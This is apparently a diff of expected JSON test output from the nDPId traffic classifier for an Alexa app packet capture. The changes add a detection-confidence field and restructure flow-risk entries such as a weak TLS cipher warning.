 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":425,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":1,"flow_last_seen":1490976044219,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976044219,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8UU1AAEAG9aGsECrYNF7ohrJqAbsS8h7YAAAAAKAC\/\/8dtwAAAgQFtAQCCAoA9k+VAAAAAAEDAwg="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":426,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":2,"flow_last_seen":1490976044265,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976044265,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwK9ZAAOcGdCQ0XuiGrBAq2AG7smlcwjrL0o9lC3ASH\/7s8AAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":427,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_packet_id":3,"flow_last_seen":1490976044267,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976044267,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoKplAAEAGHGqsECrYNF7ohrJpAbvSj2ULXMI6zFAQAVc3YgAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044189,"flow_last_seen":1490976044269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044269,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":428,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044189,"flow_last_seen":1490976044269,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044269,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":430,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":2,"flow_last_seen":1490976044285,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976044285,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwZ65AAOcGOEw0XuiGrBAq2AG7smoL+FEyEvIe2XASH\/4tIwAAAgQFtAEDAwY="}
 00450{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":431,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_packet_id":3,"flow_last_seen":1490976044287,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976044287,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoUU5AAEAG9bSsECrYNF7ohrJqAbsS8h7ZC\/hRM1AQAVd3lAAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044219,"flow_last_seen":1490976044288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044288,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044189,"flow_last_seen":1490976044331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976044331,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
-00906{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044219,"flow_last_seen":1490976044404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976044404,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8":"Weak TLS cipher"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":432,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044219,"flow_last_seen":1490976044288,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044288,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":434,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":43,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044189,"flow_last_seen":1490976044331,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976044331,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45673,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
+01013{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":441,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":44,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976044219,"flow_last_seen":1490976044404,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":324,"flow_avg_l4_payload_len":54,"midstream":0,"ts_msec":1490976044404,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45674,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"8": {"risk":"Weak TLS Cipher","severity":"High","risk_score": {"total":250,"client":225,"server":25}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"18e962e106761869a61045bed0e81c2c","unsafe_cipher":1,"cipher":"TLS_RSA_WITH_AES_128_CBC_SHA","alpn":"h2,http\/1.1"}}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":448,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":31,"flow_packet_id":3,"flow_last_seen":1490976044419,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976044419,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8G7BAAEAGvmmsECrYCsl+8Z0IH5CvoFXQAAAAAKAC\/\/\/UsgAAAgQFtAQCCAoA9k+qAAAAAAEDAwg="}
 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976044439,"flow_last_seen":1490976044439,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"ts_msec":1490976044439,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3}
 00479{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":451,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":1,"flow_last_seen":1490976044439,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976044439,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8t7dAAEAGjzesECrYNF7ohsG1AFD+AvgcAAAAAKAC\/\/9LawAAAgQFtAQCCAoA9k+rAAAAAAEDAwg="}
@@ -247,120 +247,120 @@
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":461,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":1,"flow_last_seen":1490976044521,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976044521,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8pBJAAEAGotysECrYNF7ohrJvAbuLWOumAAAAAKAC\/\/\/YXQAAAgQFtAQCCAoA9k+0AAAAAAEDAwg="}
 00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":462,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":2,"flow_last_seen":1490976044548,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976044548,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwjz9AAOcGELs0XuiGrBAq2ABQwbWwdDtt\/gL4HXASH\/7MNQAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":463,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_packet_id":3,"flow_last_seen":1490976044550,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976044550,"pkt":"AMDKkaPvePiC0\/vCCABFAAAot7hAAEAGj0qsECrYNF7ohsG1AFD+AvgdsHQ7blAQAVcWpwAA"}
-01038{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044439,"flow_last_seen":1490976044552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"ts_msec":1490976044552,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","ndpi": {"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
+01064{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":464,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":45,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044439,"flow_last_seen":1490976044552,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":996,"flow_tot_l4_payload_len":996,"flow_avg_l4_payload_len":249,"midstream":0,"ts_msec":1490976044552,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":49589,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.AmazonAlexa","breed":"Acceptable","category":"VirtAssistant"},"http": {"hostname":"alexa.amazon.com","url":"alexa.amazon.com\/lib\/bootstrap\/img\/glyphicons-halflings.png","code":0,"content_type":"","user_agent":"Mozilla\/5.0 (Linux; Android 5.1.1; LGLS751 Build\/LMY47V; wv) AppleWebKit\/537.36 (KHTML, like Gecko) Version\/4.0 Chrome\/56.0.2924.87 Mobile Safari\/537.36 PitanguiBridge\/1.16.4.5-[MANUFACTURER=LGE][RELEASE=5.1.1][BRAND=lge][SDK=22][MODEL=LGLS751]"}}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":466,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw+cBAAOcGpjk0XuiGrBAq2AG7smyRBTVcVCNXhnASH\/5KCwAAAgQFtAEDAwY="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":468,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwOIdAAOcGZ3M0XuiGrBAq2AG7sm0P1nENwoOcDHASH\/7coQAAAgQFtAEDAwY="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":469,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAw0BdAAOcGz+I0XuiGrBAq2AG7sm67yvGb9I47o3ASH\/7eewAAAgQFtAEDAwY="}
 00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":472,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":2,"flow_last_seen":1490976044585,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"ts_msec":1490976044585,"pkt":"ePiC0\/vCAMDKkVoBCABFAAAwIDxAAOcGf740XuiGrBAq2AG7sm+mtiDui1jrp3ASH\/59bgAAAgQFtAEDAwY="}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":473,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_packet_id":3,"flow_last_seen":1490976044587,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976044587,"pkt":"AMDKkaPvePiC0\/vCCABFAAAoGDZAAEAGLs2sECrYNF7ohrJsAbtUI1eGkQU1XVAQAVeUfAAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044488,"flow_last_seen":1490976044587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044587,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":474,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":46,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044488,"flow_last_seen":1490976044587,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044587,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45676,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":476,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAo07pAAEAGc0isECrYNF7ohrJtAbvCg5wMD9ZxDlAQAVcnEwAA"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":477,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_packet_id":3,"flow_last_seen":1490976044588,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976044588,"pkt":"AMDKkaPvePiC0\/vCCABFAAAodBFAAEAG0vGsECrYNF7ohrJuAbv0jjuju8rxnFAQAVco7QAA"}
 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":478,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_packet_id":3,"flow_last_seen":1490976044589,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"ts_msec":1490976044589,"pkt":"AMDKkaPvePiC0\/vCCABFAAAopBNAAEAGou+sECrYNF7ohrJvAbuLWOunprYg71AQAVfH3wAA"}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044502,"flow_last_seen":1490976044595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044509,"flow_last_seen":1490976044595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
-00824{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044521,"flow_last_seen":1490976044596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044596,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":479,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":47,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044502,"flow_last_seen":1490976044595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45677,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":480,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":48,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044509,"flow_last_seen":1490976044595,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044595,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45678,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
+00850{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":481,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":49,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976044521,"flow_last_seen":1490976044596,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":239,"flow_tot_l4_payload_len":239,"flow_avg_l4_payload_len":59,"midstream":0,"ts_msec":1490976044596,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.134","src_port":45679,"dst_port":443,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"pitangui.amazon.com","ja3":"d551fafc4f40f1dec2bb45980bfa9492","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL","alpn":"h2,http\/1.1"}}
 00480{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":485,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":33,"flow_packet_id":3,"flow_last_seen":1490976044679,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"ts_msec":1490976044679,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8WzRAAEAGfuWsECrYCsl+8Z0KH5BhrRWqAAAAAKAC\/\/9isAAAAgQFtAQCCAoA9k\/EAAAAAAEDAwg="}
